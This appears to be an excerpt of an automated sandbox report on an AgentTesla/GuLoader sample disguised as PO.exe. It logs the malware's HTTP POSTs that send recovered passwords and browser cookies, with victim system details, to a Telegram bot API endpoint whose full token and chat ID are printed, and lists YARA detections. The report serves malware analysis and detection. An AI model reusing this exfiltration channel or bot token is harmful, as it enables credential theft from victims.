2022-11-29 21:48:57 UTC	172	IN	Data Raw: 22 cb 3a 11 05 48 eb 36 0e 00 79 d2 e2 d8 03 41 f4 89 1d 34 68 24 64 fd 0d 30 ed d7 0f a1 81 e8 a0 9a 1d d7 28 9a 92 9a 5e f9 5d 11 0b d3 27 66 ae 1f c8 48 86 e8 f6 45 d0 34 03 98 46 3e da d3 bd dc ed b1 d2 46 c7 e3 1c 0d 4c ce 5e 89 f4 4b d8 4f 07 70 34 ce 8d c2 cf 2f 27 2d fa 8e 4e 89 fa 9e bf 37 03 63 65 28 88 bf fe 6d d2 d1 e8 63 57 8e fc c1 b1 b0 98 b8 11 70 4d 0a db 36 c3 07 e9 4a 2d ae d4 03 1f 8c 77 33 e4 50 77 a1 55 86 b9 a4 4c 59 50 ab 73 32 3c 63 27 6e 12 6f ec 71 ca c2 d3 c4 9d bd 1b 8f fb b6 0a e7 1f cc db be e3 eb 99 27 c9 60 93 14 b5 3a a0 5c 48 50 56 6e 5f d3 5b 69 bf a4 4b 15 f3 dd 34 d8 17 9f db af 22 3e 79 39 05 cc a3 ed 15 8a 5a c6 b4 ac e5 59 6b 80 90 b7 3e e0 07 dd 47 3a ce 7f 7a e8 24 f5 0d 1a c6 4b ca c1 53 86 b9 e7 2c bc 1a a7 88 Data Ascii: ":H6yA4h$d0(^]'fHE4F>FL^KOp4/'-N7ce(mcWpM6J-w3PwULYPs2<c'noq'`:\HPVn_[iK4">y9ZYk>G:z$KS,
2022-11-29 21:48:57 UTC	176	IN	Data Raw: 91 cb 4c 13 96 73 26 6a 92 25 98 07 6e e6 b4 80 b8 70 50 a0 d7 a7 01 5e 2c 17 f0 2c 68 38 bf 42 2f 02 82 ba 79 1c 42 3b 41 9b fe d8 9a cd 71 67 05 11 db 33 70 2a 3b 95 6e 7e 96 1b b3 b6 91 58 ae 3e 93 ab 6c de ac 17 f2 a0 15 1d 0e e4 f5 d8 e5 e1 62 46 a8 0b e1 86 9a b1 3a 1c 98 85 69 1e cc 53 28 de 35 14 ea 1b 3a 40 88 b3 6e 49 f8 b8 f7 14 22 af c1 4e 3b 1c 22 bc 66 97 b7 6b f9 f7 53 5e f5 0a c7 35 22 e7 48 9f 30 c4 bd b6 c6 f6 f0 35 01 0c 16 8f 85 7c f3 78 93 f5 f2 52 cd 28 b6 dd bd 1a ab 83 c2 36 37 15 07 8a 95 14 5a 55 ea ac 64 c1 a6 c6 7a e9 5c fe 47 d7 41 a0 fb c8 80 04 f9 c1 cd fc d8 7d 9f c1 ab 6f 1f 73 cf f2 66 3f 5d fb c4 bc 13 fe a3 0c b0 b4 71 4d 69 df 10 97 63 01 5e 5f ea e7 0e 75 dd fb 84 ea 9e b7 39 97 36 a6 64 15 4e d0 da b4 3d bb 80 d7 ce Data Ascii: Ls&j%npP^,,h8B/yB;Aqg3p*;n~X>lbF:iS(5:@nI"N;"fkS^5"H05\|xR(67ZUdz\GA}osf?]qMic^_u96dN=
2022-11-29 21:48:57 UTC	180	IN	Data Raw: 89 19 ce f1 ec b7 67 0d c9 28 5e a3 c5 7c 0d 75 ed fa 90 8c e8 a2 3b 48 7d 49 d5 8c a8 e6 b1 ba 18 85 ef be 17 88 8f 64 b0 63 d6 1b c9 c4 5f 47 38 62 fa eb 4b 0e a8 ea d0 46 db e5 d5 89 13 bb 86 68 59 64 39 9e 32 4a c0 e9 35 fc bb 00 28 1d aa 28 7a 01 98 b0 fa bb 85 76 c6 cd d4 ae 62 c8 b4 15 ea eb 5c 36 a0 7e e5 ab 8c da ae bd c4 7d b3 ca 42 21 77 61 f7 76 7d 5e f4 f4 7f 48 4d b6 6a d2 5a f0 77 e6 9c 27 50 fa de de 8b b8 9a 59 a3 7e 47 1a 9b 88 c2 fe 06 42 d3 65 78 b1 1a 81 1e c4 03 98 c5 11 f7 dd 08 ad 32 25 93 94 04 8d 1d d4 7e 1f 2e e7 31 0e 70 91 35 28 9c 0c 17 4c 24 50 15 e3 30 9c 67 c1 fa 6f 47 0a c2 ca bf d3 1e 0d bf 29 ae 1d 22 77 a3 ec 7f db c3 e3 1d 09 25 29 64 75 80 c8 97 85 ec 48 2d 56 7c ce d1 39 48 59 30 36 7b cc 6d 34 a5 17 b1 4a ad 28 3b Data Ascii: g(^\|u;H}Idc_G8bKFhYd92J5((zvb\6~}B!wav}^HMjZw'PY~GBex2%~.1p5(L$P0goG)"w%)duH-V\|9HY06{m4J(;
2022-11-29 21:48:57 UTC	184	IN	Data Raw: c5 7f ca 3a 80 90 f3 3f a8 ce de 94 fb d4 30 af 09 41 c2 66 aa 22 04 ac cf b8 64 56 43 65 00 1c 72 36 b0 68 ae b4 14 d3 8b f2 02 15 28 02 0b 5e 39 7f 50 5e 79 d9 a8 9d 16 6b 96 38 5c 90 c2 b6 b3 86 93 81 db 2e 06 dc 17 f1 11 d7 6d ec 13 ff 8b cd 1b 65 28 41 e2 6c 88 b6 02 9d 1c 7c 92 29 0c 72 73 3f 16 d9 6d 01 8e 54 4e f8 7d 50 53 94 7f 62 44 35 56 d1 2a e0 85 7c dd e7 de c2 f2 62 0f 3b 20 13 91 7c 8a 42 e4 aa 04 64 27 c9 fc b5 8d 65 64 09 5e 5d 13 db a7 69 f3 ff 02 6e 45 26 60 32 62 47 4d 5c c3 7e c4 be 62 6b a5 a4 f3 1c 01 be ca 9f f8 48 a6 30 6c 24 89 f5 02 14 ea 73 3e b9 ab 83 a0 de 97 0d 04 36 37 0c 6d db 2c 5e 5d ab cd d2 3f a5 82 5b a1 72 1f 23 0b dd 0e 69 f8 a6 d0 f8 fa 41 aa a4 fe 19 b3 de d7 83 c1 f5 27 59 e5 5f c7 69 5e c6 e3 58 9d e6 36 76 a3 Data Ascii: :?0Af"dVCer6h(^9P^yk8\.me(Al\|)rs?mTN}PSbD5V*\|b; \|Bd'ed^]inE&`2bGM\~bkH0l$s>67m,^]?[r#iA'Y_i^X6v
2022-11-29 21:48:57 UTC	188	IN	Data Raw: 4d d5 f6 36 e0 f2 53 89 f5 79 81 a7 88 65 a7 b3 c7 8d 2c 9e 31 38 bd 32 58 b6 82 89 70 ab 93 b6 10 b8 e4 f9 e7 19 aa 6a 4e 13 1a 74 59 bd 6c 84 32 8f ef 0d d5 1d 0f ce 86 0e cf ff ac e3 3a b8 d7 b7 9b 02 6c f2 6f 4a 3c 01 ba 73 7a f8 de fc d8 73 ad b0 43 a5 dd f5 0a f2 0a 6b 12 72 28 d6 c1 e3 26 60 54 0b ca 32 2b db dd 28 11 61 43 af 4d 33 22 1f c7 5b 25 8d ab 67 8f 84 35 a0 03 5a bc b4 75 cc 76 b9 20 81 20 ee 87 f2 e3 47 a8 a8 da 39 fc 35 2f 55 6f 20 f4 bf 90 e1 c6 f2 ff 42 c7 74 1c f1 7c 2d 5c f3 f4 79 de 41 07 78 34 42 8d 7d ca d2 25 41 fa c2 48 96 fa 83 bf 80 03 62 54 e3 8a ef fe 35 d4 e2 e8 57 57 27 fc 29 b4 14 9a fc 11 a7 4b 35 db 36 c3 a9 cd bf 1c 48 d6 2b 03 f8 71 31 e4 f1 54 d8 55 9c bf ab 6b 25 51 15 75 1a 36 9a 26 f8 12 bd fe a6 c6 bf d3 a9 8c Data Ascii: M6Sye,182XpjNtYl2:loJ<szsCkr(&`T2+(aCM3"[%g5Zuv G95/Uo Bt\|-\yAx4B}%AHbT5WW')K56H+q1TUk%Qu6&
2022-11-29 21:48:57 UTC	192	IN	Data Raw: ef db b2 14 5d f8 8e b8 43 e8 c8 64 d3 b2 d6 46 99 22 38 7d 38 66 e9 e9 2c 49 a8 3e 98 e2 9b 4b d7 b0 5b 38 97 22 59 22 71 08 75 a5 d7 47 7f 81 da ed 7c 7d e2 28 19 df 98 3a b1 5d e2 43 c6 6d c8 ac 05 80 b4 c1 a3 f6 06 99 a2 47 ac 43 9d 91 ae fb 8d eb f4 9b 46 8f 3c 1c 90 19 5c 03 b5 a7 3c 97 04 07 11 7d 58 ef 3e ca aa 6c 50 9e 97 48 ee b3 9e d9 e8 03 20 1d ce c8 88 fe 45 9e d3 ac 29 57 5d b6 1e f2 1c 9a 82 5b f7 03 42 db 57 89 91 8b 4e 1c 2b 9c 7e 7b 64 71 54 ae 50 11 7d 55 fb f5 42 0c 6f 50 56 3e 30 78 28 27 bd 59 47 98 dc c8 f8 98 1e d3 f4 1b ee b0 20 68 e8 19 49 92 c3 87 56 9f 40 82 60 f5 c9 b5 f0 d9 ba 08 61 56 3f 14 d1 1f 25 bf 77 07 7b b3 77 36 e2 5b b1 94 e1 22 59 1c db 5a be c4 47 17 84 3f fb ec fb b7 15 6b 71 f5 e2 60 75 56 ec 47 2c ac 09 25 9b Data Ascii: ]CdF"8}8f,I>K[8"Y"quG\|}(:]CmGCF<\<}X>lPH E)W][BWN+~{dqTP}UBoPV>0x('YG hIV@`aV?%w{w6["YZG?kq`uVG,%
2022-11-29 21:48:57 UTC	193	IN	Data Raw: 4d 63 b7 4d 92 1e 41 24 40 04 cd 0c e3 e8 83 a6 d1 05 8c d7 38 89 ed eb 59 a5 7b 54 02 3a ee 22 7b 9e 6f fa 93 a2 bf 26 23 37 01 14 2d d7 14 49 3e 29 d5 4c 5c 33 ca 9d d3 3b b9 42 c9 4d 16 6e 0f d9 27 6d ea dc fb 96 54 46 2e c4 5a a0 32 85 1e 72 f7 7e d0 f7 92 b4 71 52 07 a9 16 17 13 12 5b 0e 9f 09 ff 64 6e 80 41 80 f3 08 b6 ca c9 a7 dd 0b 5d 63 95 41 d0 7b bd 2a a5 65 9c ce a1 5f 2e 48 6f dc 0d b6 f6 9f fe 06 78 5c 61 7c 00 45 48 fa 9e 0a 2f 49 3c c7 99 39 37 50 f0 d8 05 bd 3a 44 b1 ef 97 5e 00 9d 8c 96 e7 b3 07 25 5b 62 40 e7 3d c0 3e 72 c2 a8 3c 70 a8 03 cc b1 0f 35 4d 6a 24 40 90 fa 6c 0a 9c b8 25 70 23 ef 43 4c 00 78 59 d6 00 97 ff 0f 6f 90 f5 0b 4c 41 de 35 f8 af 3e c8 59 aa 4f d9 83 a7 7e 45 19 6d cd f2 f5 13 90 1d 76 86 7f 13 2b 6d ae a9 0c 45 c6 Data Ascii: McMA$@8Y{T:"{o&#7-I>)L\3;BMn'mTF.Z2r~qR[dnA]cA{*e_.Hox\a\|EH/I<97P:D^%[b@=>r<p5Mj$@l%p#CLxYoLA5>YO~Emv+mE
2022-11-29 21:48:57 UTC	197	IN	Data Raw: 26 86 9f 7b 5c 98 ac 83 73 57 5b fe e0 f7 d9 53 e9 e7 d5 8c 5a b2 14 3e 5f 23 69 13 b6 b2 39 8b b6 d4 fc 6c 9b d7 ac 76 bb bf 90 5d 79 09 45 88 a8 a3 90 1a 96 95 4b a3 8f c6 e7 c1 49 e5 12 62 77 55 59 9e 10 17 0c e9 f2 54 d1 d6 e1 34 af ac 53 ac ae c6 c2 06 78 5d 0b 10 89 0f bf 72 8b 82 20 9c f5 48 3f cf c5 a7 6c fb 88 74 f3 9d e8 f3 0a 3e 0a 26 a7 71 eb ee d7 38 7f 96 9b 96 22 e6 8f 20 d5 96 bf 4f bf 4e 5d 69 41 73 da 8c 26 20 fb 19 b3 97 aa 6a a3 8d 3d 68 a0 03 37 07 50 78 53 81 d7 4c 58 ef df cc 08 76 c5 46 1b fb db 31 94 2d e6 79 a3 44 e2 c6 07 ab c0 c4 98 93 24 a4 c7 71 a0 32 ad b9 c2 bd 87 84 dd b6 2f b3 1c 73 99 1d 44 1f 9b 99 0f bf 3f 62 3f 56 32 e8 14 be 8c 54 25 9b b2 48 c8 95 f0 db c8 77 2e 3b a0 eb ae bd 69 b9 a3 89 11 32 57 9e 74 d1 35 ee 8b Data Ascii: &{\sW[SZ>_#i9lv]yEKIbwUYT4Sx]r H?lt>&q8" ON]iAs& j=h7PxSLXvF1-yD$q2/sD?b?V2T%Hw.;i2Wt5
2022-11-29 21:48:57 UTC	201	IN	Data Raw: 65 6e c5 33 1e ba 04 14 8b 61 15 68 ef b4 ec ba db 20 06 fb 89 4d cc 69 54 ec 40 3c 38 9c 7e 19 7b 1c 49 2b 46 62 c9 3d a2 33 90 32 55 78 7f ac 7c 85 0b 46 5d 63 00 cd 32 b7 c3 82 cd e1 67 c5 d0 28 ec cc ec 37 97 70 35 29 2b ee 0d 7c ea 51 db e1 a5 b9 43 2e 21 68 11 23 a4 71 58 5b 3b e8 0f 49 34 ae 90 df 4f bd 50 c6 51 64 65 03 cf 78 6b ec ba d9 80 38 76 0e b6 7a a7 57 ad 09 1b d1 71 a3 bf 82 d1 64 6e 52 b8 10 53 15 17 3a 1f 90 7d d9 75 0b 82 47 ee e0 02 d7 ce d9 a7 cb 03 5b 76 9c 5f fe 6d a6 2f a5 73 ff f9 ba 55 21 4f 24 cb 09 aa f2 80 e4 65 2e 70 7d 73 06 6f 55 e0 95 1b 73 7e 21 d1 a5 2c 3e 7f e2 ab 3f a7 49 63 b1 ec dd 48 1a 8a 86 9a 90 92 4c 00 51 79 5b f1 7c f7 29 6f a1 eb 04 70 b8 32 d7 b0 1f 35 4f 76 29 36 b7 ec 1f 20 97 d6 12 14 70 d3 54 38 23 71 Data Ascii: en3ah MiT@<8~{I+Fb=32Ux\|F]c2g(7p5)+\|QC.!h#qX[;I4OPQdexk8vzWqdnRS:}uG[v_m/sU!O$e.p}soUs~!,>?IcHLQy[\|)op25Ov)6 pT8#q
2022-11-29 21:48:57 UTC	205	IN	Data Raw: d8 93 c7 85 5a d2 fd 84 e9 00 b9 1a a4 d4 a4 18 17 eb f8 d8 b5 2f 3b 87 d9 23 77 59 d9 69 8e 02 c6 f8 29 63 26 50 6c f2 86 4f a1 0d 54 55 e6 ff 0e 3a f4 df e0 3f 39 33 9d 89 f6 b3 29 69 25 b3 fe 17 9c 73 70 0e 54 61 76 b4 d1 72 89 d0 b1 e0 0f fe a2 fb 13 df d7 f8 41 07 7d 15 d3 c3 c0 f1 78 93 d7 27 b1 4c 6b e2 a5 25 f7 d7 cb 73 13 34 93 59 78 0c a1 82 44 80 b1 83 26 6e 0d 2d 43 1c 9c 05 bf 05 bf b3 72 8f 49 cc 05 6e 17 69 f5 9a 2a 4c 23 20 ec 2d 88 fa 0e 12 14 ec 9d 6e 4b 75 4c f5 1a ba 1c 63 59 3a f8 fd 7f 96 8c af 65 b1 e7 56 f7 cd 25 55 28 b8 cd bc 69 9a 1c 28 a9 cd e7 ca 83 26 fc 0f 30 d1 4a 59 6e 33 28 31 ec d9 1e b7 74 aa 25 85 1b aa 29 72 8b 9f 7e fa 55 9a 0e ce 03 87 8c 61 c9 a9 86 e2 fe 40 d0 a0 02 eb 4d dd df ac af 99 e3 be d2 42 d6 f4 19 f9 72 Data Ascii: Z/;#wYi)c&PlOTU:?93)i%spTavrA}x'Lk%s4YxD&n-CrIni*L# -nKuLcY:eV%U(i(&0JYn3(1t%)r~Ua@MBr
2022-11-29 21:48:57 UTC	209	IN	Data Raw: bb 85 fb b6 4a 2f 43 6e d9 78 5a 7b 3e 72 45 75 e7 3c 31 b0 05 30 75 ac 30 bf 39 b3 0b e5 84 62 1f ea 54 86 b3 ad f8 57 65 18 81 15 32 28 02 b1 52 4d 48 d4 7b fa a5 23 18 93 41 04 c9 b2 46 14 3f 4c 2d ae 9b 71 86 0b 57 58 fc 18 d8 a9 69 53 23 1a 09 a8 d3 8e 57 9c 7f 3e 13 19 f4 3a f9 79 27 dc ad 64 ab ec a3 bf f3 27 3b 66 82 86 48 08 01 88 4b 62 59 5a 59 44 e0 64 04 9b 12 84 81 a9 c8 37 c1 e0 00 7e 5d 56 c0 2d 2b 5e 36 f9 3a 5f f8 f2 a5 2e c6 b0 03 23 76 83 26 ae 35 ae 20 dd b6 e0 46 83 e4 c5 0d 42 72 cd 73 7c be 00 d5 b1 e3 34 b0 3f 15 a2 7d 05 f1 31 49 03 f4 14 94 0f 73 e8 2a 8f 94 6d be b2 a4 b7 80 62 20 05 71 81 f6 28 dc 7e ce 19 ea a8 49 99 41 29 c0 db 66 d6 86 ff 16 cc 79 03 89 5f 6f 2f 26 9b f6 6c 6c 11 47 d9 e2 4a 36 00 10 eb 62 c3 3f 05 bd 9c f6 Data Ascii: J/CnxZ{>rEu<10u09bTWe2(RMH{#AF?L-qWXiS#W>:y'd';fHKbYZYDd7~]V-+^6:_.#v&5 FBrs\|4?}1Is*mb q(~IA)fy_o/&llGJ6b?
2022-11-29 21:48:57 UTC	213	IN	Data Raw: c2 1e a0 c7 be d9 d7 c6 80 05 eb 40 ae ee df 8d 74 c4 d1 6d 4a dc 38 fa 7a 23 d9 79 be 85 f3 dc df 0e cb 18 0a 4b 6e dd 94 17 11 0c bf 5d 95 e6 98 49 5d 82 94 ed 0e a5 94 6a c2 24 d5 07 b8 ec 85 a6 bd 77 1e de 26 75 58 d6 fa 1e 15 67 0d 34 e4 be 49 7e 71 f6 4f 4a 78 46 d6 8e e3 8a 4b f0 de ef 2c 29 b6 ec 85 f3 bb 29 69 54 b4 fe 14 71 ad 54 0a 57 8c a4 b2 d2 43 0b 31 bb fc 0b fe 23 f7 1c d9 d0 7b 59 08 6c 31 57 c7 c2 ff 71 16 d3 23 a3 cc 2a e3 80 25 e5 d7 07 71 06 27 1f fe 7a 1e 21 72 50 81 a5 0d e1 ea c6 2e 43 34 8d 83 77 1e 3b 6c 6e 08 cc c5 02 fc 4b ce f1 88 aa b2 a5 c2 ee 04 81 f3 14 94 f1 e9 af ee cf 75 45 d2 1e ba 1c 56 4e 9a 2d fd 7f a7 82 8a 64 b0 e7 56 c6 d9 22 5f 28 b8 e4 a0 e7 42 09 ab 6e 50 06 ca 83 33 fc 19 38 d1 78 d9 80 2b 88 e7 e3 d5 00 30 Data Ascii: @tmJ8z#yKn]I]j$w&uXg4I~qOJxFK,))iTqTWC1#{Yl1Wq#*%q'z!rP.C4w;lnKuEVN-dV"_(BnP38x+0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49854	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 21:50:36 UTC	218	OUT	POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8df Host: api.telegram.org Content-Length: 999 Expect: 100-continue Connection: Keep-Alive
2022-11-29 21:50:36 UTC	218	IN	HTTP/1.1 100 Continue
2022-11-29 21:50:36 UTC	218	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 35 63 32 30 65 38 62 38 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 36 31 36 31 36 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 35 63 32 30 65 38 62 38 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 36 33 32 39 32 32 0a 4f 53 46 75 6c 6c Data Ascii: -----------------------------8dad25c20e8b8dfContent-Disposition: form-data; name="chat_id"561616954-----------------------------8dad25c20e8b8dfContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/632922OSFull
2022-11-29 21:50:53 UTC	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 29 Nov 2022 21:50:53 GMT Content-Type: application/json Content-Length: 620 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":47515,"from":{"id":5088709131,"is_bot":true,"first_name":"banty","username":"bantyloggers_bot"},"chat":{"id":561616954,"first_name":"Ghost","username":"GostMan667","type":"private"},"date":1669758653,"document":{"file_name":"user-632922 2022-11-29 10-50-34.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAK5m2OGfr2yjuWz4LoB56FbDH1O1tV3AALKDQAC5r8wUJ8KQy5FsLx8KwQ","file_unique_id":"AgADyg0AAua_MFA","file_size":426},"caption":"New PW Recovered!\n\nUser Name: user/632922\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49855	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 21:50:55 UTC	220	OUT	POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dad25c2ca67ace Host: api.telegram.org Content-Length: 21528 Expect: 100-continue
2022-11-29 21:50:55 UTC	221	IN	HTTP/1.1 100 Continue
2022-11-29 21:50:55 UTC	221	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 35 63 32 63 61 36 37 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 36 31 36 31 36 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 35 63 32 63 61 36 37 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 36 33 32 39 32 32 0a 4f 53 Data Ascii: -----------------------------8dad25c2ca67aceContent-Disposition: form-data; name="chat_id"561616954-----------------------------8dad25c2ca67aceContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/632922OS
2022-11-29 21:50:55 UTC	222	OUT	Data Raw: 7f 59 5e 72 f3 2f c1 3a 80 11 0a 8e 4a c3 d3 e8 38 12 fd 5f 39 a4 50 f1 64 2a 9e be 54 ca 02 37 34 46 18 02 a1 fe 67 37 30 86 23 72 0c 15 cb 88 1d 6c 04 8e f8 2f 5c 6a cf 3b a4 90 a9 ff 42 18 8c e9 05 c0 30 9a 82 a1 fe 2b 79 da 5a 3e ae 0e 1e 3e 36 f2 6a 4b 93 88 96 fc 7c aa d0 92 07 12 82 96 3c 10 8f ea ea 30 2e 2e 49 a4 34 2b 0b 9e 14 8a 8b a7 45 13 00 e7 98 18 3a 99 f9 37 fa 57 82 44 eb fc fa 45 18 3a c1 f6 fc 7f 3a 43 81 80 fc 47 08 63 e5 96 14 17 67 4d 45 30 0b 6a 22 8e 8e 01 2e b6 df 8a 68 e0 13 35 a0 6c 75 76 73 b5 f3 45 7a a2 ec 91 0b 72 e2 af fc e7 ee e9 e0 82 f4 0c 90 77 b2 09 d0 92 9f 2b 45 17 38 57 57 65 e3 92 34 15 ff 53 9e 03 2c a0 75 80 9f ec 0c 4d 3c 80 30 08 e3 62 87 5e 67 81 8e 42 5f 32 fe 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 f9 Data Ascii: Y^r/:J8_9Pd*T74Fg70#rl/\j;B0+yZ>>6jK\|<0..I4+E:7WDE::CGcgME0j".h5luvsEzrw+E8WWe4S,uM<0b^gB_2
2022-11-29 21:50:55 UTC	238	OUT	Data Raw: 94 d7 94 bd 97 f5 33 ab 1b 2b 3f cb 20 4f 35 87 35 4f 8f c0 06 36 41 0e 3c 5b 2c c7 03 2e 5d de 66 de a3 7c 6c d0 78 a8 fd bf e8 49 33 7c 98 ff df d6 6d ff 67 c8 02 2d 1d 28 eb b2 8d 1a c4 7a 15 a0 82 5b 7c 77 51 65 86 08 92 01 aa 24 86 ab 65 6a 1f c4 3a 29 a0 c8 06 6e 2e 2a 9e 11 81 ec 01 2c 39 ff d3 de 9f 47 82 0b a2 24 ca 50 f9 f7 14 bf ab 83 35 82 2a cd 28 39 80 8f 43 c9 31 21 04 1c 96 d1 1e 8e 02 c6 eb 1d ac 6d 10 d1 32 40 a5 b0 f4 9e b5 17 e3 8b 94 55 5c 10 84 14 e3 26 a3 eb c1 28 0e 68 58 2a 9e c2 0c 3b 34 3a 1c 13 4a 43 90 b5 19 f7 4d 97 bb 0f 6c 22 0a a7 63 c2 d1 3e 48 b4 ae ae 91 9e ae 9e 9e 0e 5a 1f 41 92 05 4e 58 5e f6 0b f8 50 04 91 a1 05 21 ba fc e3 10 04 0e 6b 16 9d 7f 2b 30 a4 81 d1 9e c5 b1 ce 1c d8 41 e0 f4 80 c1 01 c6 bd 7f 3e 0e 80 c0 Data Ascii: 3+? O55O6A<[,.]f\|lxI3\|mg-(z[\|wQe$ej:)n.,9G$P5(9C1!m2@U\&(hX*;4:JCMl"c>HZANX^P!k+0A>
2022-11-29 21:50:55 UTC	242	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 35 63 32 63 61 36 37 61 63 65 2d 2d 0d 0a Data Ascii: -----------------------------8dad25c2ca67ace--
2022-11-29 21:50:56 UTC	242	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 29 Nov 2022 21:50:56 GMT Content-Type: application/json Content-Length: 631 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":47516,"from":{"id":5088709131,"is_bot":true,"first_name":"banty","username":"bantyloggers_bot"},"chat":{"id":561616954,"first_name":"Ghost","username":"GostMan667","type":"private"},"date":1669758656,"document":{"file_name":"user-632922 2022-11-29 10-50-54.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAK5nGOGfsAwd07zJqbEjvELXwt-hMMBAALLDQAC5r8wUK-B_cmCaDsIKwQ","file_unique_id":"AgADyw0AAua_MFA","file_size":20946},"caption":"New Cookie Recovered!\n\nUser Name: user/632922\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO.exePID: 5272, Parent PID: 5080

General

Target ID:	1
Start time:	22:47:26
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\PO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO.exe
Imagebase:	0x400000
File size:	269537 bytes
MD5 hash:	9297126FD9624F7DC2D4F64F072668A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7240, Parent PID: 5272

General

Target ID:	4
Start time:	22:48:35
Start date:	29/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO.exe
Imagebase:	0xd30000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 